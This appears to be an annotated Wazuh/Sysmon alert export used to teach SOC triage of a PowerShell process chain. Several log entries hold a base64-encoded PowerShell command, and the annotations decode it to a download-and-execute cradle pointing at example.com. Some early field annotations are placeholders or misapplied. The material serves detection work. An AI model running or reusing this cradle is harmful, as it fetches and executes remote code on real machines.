data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:50.192
ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ProcessId: 10808
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ParentProcessId: 12224
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:50.192 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd02-680a-0b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 44 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1272833 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:51.7105256Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283231 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:51.697
ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ProcessId: 10808
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_is1i0e3l.l1c.ps1
CreationUtcTime: 2025-04-24 22:36:51.697
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:51.697 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd02-680a-0b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_is1i0e3l.l1c.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:51.697 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 41 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1275602 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:53.8027624Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283265 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:52.626
ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ProcessId: 13712
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00}
ParentProcessId: 10808
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:52.626 Sysmon's own timestamp for when it saw the process start (UTC). Compare with data.win.system.systemTime, which is when the record was written to the log.
data.win.eventdata.processGuid: {94294ddc-bd04-680a-0f0b-000000000e00} Sysmon's process GUID. Unlike the PID it is not reused after the process exits, so it is the key for joining this EID 1 to the EID 11 and other events from the same process.
data.win.eventdata.processId: 13712 PID of the new process. PIDs are reused, so correlate on processGuid instead.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that started.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the image's PE version resource.
data.win.eventdata.description: Windows PowerShell Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Original file name from the PE version resource. It survives renaming the binary on disk, so a mismatch with image is a red flag.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. The -EncodedCommand argument is base64 of a UTF-16LE string, not UTF-8; here it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. Note the executable path appears twice: the second copy is the first argument handed to powershell.exe.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (DOMAIN\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} GUID of the logon session the process belongs to.
data.win.eventdata.logonId: 0x26584 Logon session ID. Pivot to the Security log 4624 event with the same Logon ID to see how this session was created.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive desktop session; 0 is where services run.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a standard, non-elevated user; High would mean an elevated (admin) token.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file, in the algorithms Sysmon is configured for. This is the hash of powershell.exe itself, so it confirms the binary is genuine; it says nothing about the payload.
data.win.eventdata.parentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} Sysmon GUID of the parent. Join it to the parent's own EID 1 to walk the process tree.
data.win.eventdata.parentProcessId: 10808 PID of the parent.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Path of the parent executable.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's full command line. It is identical to commandLine: PowerShell (PID 10808) has launched PowerShell (PID 13712) with the same encoded payload.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child; a change here would mean a token or privilege boundary was crossed.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline, then check it against the evidence: the "executable" here is a __PSScriptPolicyTest_*.ps1 file in the user's Temp folder, which PowerShell itself writes on every start-up to test whether an AppLocker/WDAC policy enforces script execution. On its own that is expected noise. What keeps this alert relevant is that the creating process (PID 13712) is the encoded-command PowerShell from the preceding EID 1 alert, so triage it as part of that chain rather than as a separate file drop.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 45 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1283673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID must be read against Sysmon's numbering, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; this is Sysmon's fixed provider GUID.
data.win.system.eventID: 11 Sysmon event ID, not a Security log ID. 11 = FileCreate (1 = ProcessCreate, 3 = NetworkConnect, 22 = DNS query).
data.win.system.version: 2 Schema version of this event type; Sysmon bumps it when it adds fields.
data.win.system.level: 4 ETW level. 4 = Informational, matching severityValue below.
data.win.system.task: 11 For Sysmon events this mirrors the event ID (11 = FileCreate). The Security-log task categories (Logon, Policy Change) do not apply here.
data.win.system.opcode: 0 ETW opcode; 0 = Info. Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:54.0658636Z When the record was written to the event log (UTC). The activity itself is stamped in data.win.eventdata.utcTime, which is usually a little earlier.
data.win.system.eventRecordID: 283266 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported on (that is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; this is the Sysmon log.
data.win.system.computer: Attacker Host that generated the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:54.027
ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ProcessId: 13712
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tav0px12.umw.ps1
CreationUtcTime: 2025-04-24 22:36:54.027
User: Attacker\Attcker1" Sysmon's rendered message text. Every field in it is also parsed into data.win.eventdata below, so search and match on those fields rather than on this string.
data.win.eventdata.utcTime: 2025-04-24 22:36:54.027 Sysmon's timestamp for the file creation (UTC).
data.win.eventdata.processGuid: {94294ddc-bd04-680a-0f0b-000000000e00} Sysmon GUID of the creating process. It is the same GUID as the EID 1 alert for PID 13712 above, which ties this file to the encoded-command PowerShell.
data.win.eventdata.processId: 13712 PID of the creating process. PIDs are reused; correlate on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Process that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tav0px12.umw.ps1 Path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell on every start-up to probe AppLocker/WDAC script enforcement; the file itself is not the payload.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:54.027 File creation timestamp. Equal to utcTime here, as expected for a brand-new file; if it were earlier than utcTime, an existing file was re-created or its timestamp reset (a timestomping clue).
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline. Decode the -EncodedCommand (base64 of UTF-16LE) before anything else: here it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. Note also that ParentCommandLine is identical to CommandLine and that rule.firedtimes keeps climbing: PowerShell is re-spawning itself with the same payload every few seconds (PIDs 10808 -> 13712 -> 5848 -> 11360 across these alerts).
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 42 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534229.1286442 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID must be read against Sysmon's numbering, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; this is Sysmon's fixed provider GUID.
data.win.system.eventID: 1 Sysmon event ID, not a Security log ID. 1 = ProcessCreate (the Sysmon counterpart of Security 4688, with hashes and parent details added).
data.win.system.version: 5 Schema version of this event type; Sysmon bumps it when it adds fields.
data.win.system.level: 4 ETW level. 4 = Informational, matching severityValue below.
data.win.system.task: 1 For Sysmon events this mirrors the event ID (1 = ProcessCreate). The Security-log task categories (Logon, Policy Change) do not apply here.
data.win.system.opcode: 0 ETW opcode; 0 = Info. Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:57.6945948Z When the record was written to the event log (UTC). The process start itself is stamped in data.win.eventdata.utcTime, about 2.5 s earlier here.
data.win.system.eventRecordID: 283300 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported on (that is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; this is the Sysmon log.
data.win.system.computer: Attacker Host that generated the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:55.050
ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00}
ProcessId: 5848
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00}
ParentProcessId: 13712
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text. Every field in it is also parsed into data.win.eventdata below, so search and match on those fields rather than on this string.
data.win.eventdata.utcTime: 2025-04-24 22:36:55.050 Sysmon's own timestamp for when it saw the process start (UTC). Compare with data.win.system.systemTime, which is when the record was written to the log.
